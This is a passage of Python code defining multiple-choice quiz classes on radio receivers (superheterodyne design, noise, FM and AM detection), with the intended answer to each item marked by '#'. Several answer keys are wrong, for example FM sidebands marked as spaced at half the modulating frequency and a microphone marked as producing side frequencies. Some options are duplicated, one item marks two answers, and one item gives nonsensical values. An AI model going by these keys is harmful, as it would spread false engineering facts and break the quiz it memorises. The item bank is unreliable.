choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A notch filter is sometimes used in communication receivers to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'noise figure'\n\t\tchoice_b = 'noise temperature'\n\t\tchoice_c = 'input noise voltage #\t' \n\t\tchoice_d = 'equivalent noise resistance'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which one ot the following is not a useful quantity for comparing the noise performance of receivers?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_1_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'leak type bias must be used'\n\t\tchoice_b = 'output must be tuned'\n\t\tchoice_c = 'the circuit is always biased in class C, by virtue of leak type bias #'\n\t\tchoice_d = 'when the input increases past the threshold of limiting, the gain decreases to keep the output constant'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statements about the limiter is not valid?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reduce interfering noise due to ignition system'\n\t\tchoice_b = 'reduce noise due to electrical storms'\n\t\tchoice_c = 'reduce interference due to electrical machinery'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Noise limiter is provided on AM receivers to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'diagonal clipping'\n\t\tchoice_b = 'poor AGC operation'\n\t\tchoice_c = 'poor AF response'\n\t\tchoice_d = 'negative peak clipping #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A low ratio of athe AC load impedance of a diode detector results in\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'insulator'\n\t\tchoice_b = 'inductor'\n\t\tchoice_c = 'capacitor #'\n\t\tchoice_d = 'variable resistor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A trimmer is basically a \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'all stages contribute equally to noise'\n\t\tchoice_b = 'RF stage has no effect on S/N ratio'\n\t\tchoice_c = 'mixer stage contributes most of the noise generated #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'highest at the midrange frequency and lower at other frequency #'\n\t\tchoice_b = 'lower at midrange and higher at the low and high frequencies'\n\t\tchoice_c = 'relatively uniform at all frequencies'\n\t\tchoice_d = 'very high at extremes at very low midrange frequencies'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which curve represents the fidelity curve of a standard receiver?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the gain IF amplifier'\n\t\tchoice_b = 'the gain of RF amplifier'\n\t\tchoice_c = 'the noise figure'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The sensitivity of a superheterodyne receiver is determined by\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the local oscillator frequency is made higher than the incoming signal frequency #'\n\t\tchoice_b = 'the local oscillator frequency is made lower than the incoming signal frequency'\n\t\tchoice_c = 'the local oscillator frequency is made equal to the incoming signal frequency'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'mixer stage'\n\t\tchoice_b = 'power supply'\n\t\tchoice_c = 'power supply #'\n\t\tchoice_d = 'equally from above three'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the maximum contribution to noise if from\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'is constant with frequency #'\n\t\tchoice_b = 'increases with frequency'\n\t\tchoice_c = 'decreases with frequency'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Power spectral density of white noise\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'four times the modulating frequency'\n\t\tchoice_b = 'twice the modulating frequency'\n\t\tchoice_c = 'half the modulating frequency #'\n\t\tchoice_d = 'modulating frequency'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a FM waveform, the side bands are spaced at intervals equal to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '5870'\n\t\tchoice_b = '3655'\n\t\tchoice_c = '236 #'\n\t\tchoice_d = '13.3'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A receiver having an RF amplifier and an IF of 450 kHz, has Q of the coils 65 and an incoming frequency 1200 kHz, the image rejection of the receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'insulator'\n\t\tchoice_b = 'variable resistance'\n\t\tchoice_c = 'capacitor'\n\t\tchoice_d = 'inductor #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A padder is basically a/an\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'facilitate tracking'\n\t\tchoice_b = 'allow permit adequate frequency coverage without switching #'\n\t\tchoice_c = 'facilitate image frequency rejection'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a radio receiver, the local oscillator is always tuned to a frequency higher than the incoming frequency to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '555 kHz'\n\t\tchoice_b = '1010 kHz'\n\t\tchoice_c = '1465 kHz #'\n\t\tchoice_d = '1920 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"When a superheterodyne receiver is tuned to 455 kHz, its local oscillator provides a mixer with the input at 1010 kHz. The image frequency is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1010 kHz'\n\t\tchoice_b = '1455 kHz'\n\t\tchoice_c = '1910 kHz #'\n\t\tchoice_d = '545 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz, the image frequency at 1000 kHz will be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'of higher frequency'\n\t\tchoice_b = 'of lower frequency'\n\t\tchoice_c = 'of high L/C ratio'\n\t\tchoice_d = 'of constant passband #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a superheterodyne receiver , the IF stage has better selectivity than the RF stage because\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'AM-DSB signal with suppressed carrier'\n\t\tchoice_b = 'AM-DSB signal with carrier #'\n\t\tchoice_c = 'AM-DSB signal with carrier'\n\t\tchoice_d = 'a sequence of exponentially decaying sine waves'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An arbitrary signal m(t) has zero average value and it is bandlimited to 3.2 kHz. It is sampled at the rate of 8ksamples/s. The samples are passed through an ideal bandpass filter with center frequency of 32 kHz and bandwidth of 6.4 kHz. The output of bandpass filter is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'provide higher selectivity #'\n\t\tchoice_b = 'provide higher fidelity'\n\t\tchoice_c = 'improve linearity'\n\t\tchoice_d = 'large passband'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The purpose of incorporating a pre-selector stage in a receiver is to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'independent of the frequency at which the receiver is tuned'\n\t\tchoice_b = 'always outside the operating range of the receiver'\n\t\tchoice_c = 'typical to FM receivers only #'\n\t\tchoice_d = 'not rejected by the IF tuned circuits'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The image frequency of a superheterodyne receiver is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'loudspeaker'\n\t\tchoice_b = 'frequency changer #'\n\t\tchoice_c = 'demodulator'\n\t\tchoice_d = 'audio amplifier'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, which of the following device has RF input but IF output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'capacitive coupling'\n\t\tchoice_b = 'impedance coupling'\n\t\tchoice_c = 'double-tuned transformer coupling #'\n\t\tchoice_d = 'single-tuned transformer coupling'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The IF stage of a receiver employs \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Mf'\n\t\tchoice_b = 'Mf / 2'\n\t\tchoice_c = '2 Mf #'\n\t\tchoice_d = 'U Mf'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A FM signal with modulation index Mf is passed to a frequency doubler. The wave in the output of the doubler will have a modulation index of \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'poor sensitivity of RF amplifier'\n\t\tchoice_b = 'high gain of IF amplifier'\n\t\tchoice_c = 'inadequate image frequency rejection #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Double spotting in a receiver is due to\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'gang condenser'\n\t\tchoice_b = 'variable sensivity #'\n\t\tchoice_c = 'padder capacitor'\n\t\tchoice_d = 'any of the above'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Three-point-tracking can be achieved with\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improve selectivity of the receiver'\n\t\tchoice_b = 'improve the effectiveness of the AGC'\n\t\tchoice_c = 'reduce the effect of negative peak clipping #'\n\t\tchoice_d = 'reduce the effect of noise at all frequencies'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a transistor receiver, the use of FET as the first stage amplifier is likely to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'synchronous'\n\t\tchoice_b = 'envelope detector #'\n\t\tchoice_c = 'radio detector'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The household radio receiver uses\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'solar noise'\n\t\tchoice_b = 'cosmic noise'\n\t\tchoice_c = 'galactic noise '\n\t\tchoice_d = 'atmospheric noise #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following noise sources is different from that of the remaining? \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'sensitivity'\n\t\tchoice_b = 'double spotting'\n\t\tchoice_c = 'blocking #'\n\t\tchoice_d = 'all of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A receiver having poor IF selectivity will also have poor\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_30():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'True, False'\n\t\tchoice_b = 'False, True'\n\t\tchoice_c = 'True, True #'\n\t\tchoice_d = 'False, False'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"I. Diode is the most common device used for demodulation\nII. A discriminator is a FM detector\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Fewer tuned circuits'\n\t\tchoice_b = 'Better linearity'\n\t\tchoice_c = 'Greater limiting #'\n\t\tchoice_d = 'Much easier alignment'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following statement about the advantage of phase discriminator over the slope detctor is false?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'the sensitivity expressed in terms of voltage that must be applied to the receiver to give a standard output'\n\t\tchoice_b = 'the extent to which the receiver is capable of distinguishing between the desired signal and other frequencies'\n\t\tchoice_c = 'the variation of the output with the modulation frequency when the output impedance is a resistance #'\n\t\tchoice_d = 'none of the choice'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Fidelity of a receiver represents\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'microphone #'\n\t\tchoice_b = 'demodulator in a superheterodyne receiver'\n\t\tchoice_c = 'modulator in a radio transmitter'\n\t\tchoice_d = 'oscillator in a receiver'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following produces upper and lower side frequencies?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '20 kHz #'\n\t\tchoice_b = '455 kHz'\n\t\tchoice_c = '1455 kHz'\n\t\tchoice_d = 'more than 455 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The passband of the tuned circuits of a radio receiver should be equal to \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'armstrong oscillator #'\n\t\tchoice_b = 'colpitts oscillator'\n\t\tchoice_c = 'clapp oscillator'\n\t\tchoice_d = 'ultra oscillator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a broadcast superheterodyne receiver having no RF amplifier, the loaded Q of the antenna coupling circuit is 100. If the intermediate frequency is 455 kHz. In receiverse operating up to the limit of shortwave broadcasting the local oscillator often used is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'better sensitivity'\n\t\tchoice_b = 'improved signal to noise ratio'\n\t\tchoice_c = 'better coupling of receiver to the antenna'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"RF amplifiers are used in radio receivers for \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'increases as the modulation index increases'\n\t\tchoice_b = 'reduces as the modulation index increases'\n\t\tchoice_c = 'increases as the modulation index decreases #'\n\t\tchoice_d = 'remains consant when the modulation index decreases #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In an FM signal, the power\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '34 %'\n\t\tchoice_b = '55.5 %'\n\t\tchoice_c = '68.8 %'\n\t\tchoice_d = '84.7 % #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An unmodulated voltage 10 V effective is applied to a diode detector in which load resistance is 4 x 10^(-5) ohms. A micrometer shows that the rectified DC current in this resistance is 30 A. The efficiency of detection is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'somewhat bettern when the receiveing frequency is raised'\n\t\tchoice_b = 'somewhat better at intermediate frequency'\n\t\tchoice_c = 'somewhat worse when the receiving frequency is lowered '\n\t\tchoice_d = 'somewhat worse when the receiving frequency is raised #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Selectivity varies with receiving frequency, frequency is raised\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '8 MHz'\n\t\tchoice_b = '9.9 MHz'\n\t\tchoice_c = '10.7 MHz #'\n\t\tchoice_d = '12.2 MHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"FM receivers using the standard 88 to 108 MHz band use IF of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'IF stage #'\n\t\tchoice_b = 'RF stage'\n\t\tchoice_c = 'power amplification stage'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Most of the amplification of the received signal is obtained in a superheterodyne receiver from the \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'instability'\n\t\tchoice_b = 'insufficient adjacent frequency rejection'\n\t\tchoice_c = 'bandwidth variation'\n\t\tchoice_d = 'all of the above #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The problem associated with tuned radio frequency receiver is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'transit-time noise #'\n\t\tchoice_b = 'shot noise'\n\t\tchoice_c = 'flicker noise'\n\t\tchoice_d = 'agitation noise'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following noise becomes of great importanve at high frequencies?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'AM'\n\t\tchoice_b = 'FM'\n\t\tchoice_c = 'SSB'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Superheterodyne receiver can be used in \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_46():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'tracking will be improved #'\n\t\tchoice_b = 'tracking will be poor'\n\t\tchoice_c = 'selectivity will be poor'\n\t\tchoice_d = 'image frequency rejection will be poor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a receiver, at higher frequencies\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_47():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'phase discriminator #'\n\t\tchoice_b = 'product detector'\n\t\tchoice_c = 'balanced modulator'\n\t\tchoice_d = 'beat frequency oscillator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following circuit cannot be used to demodulate SSB?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_48():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'improves 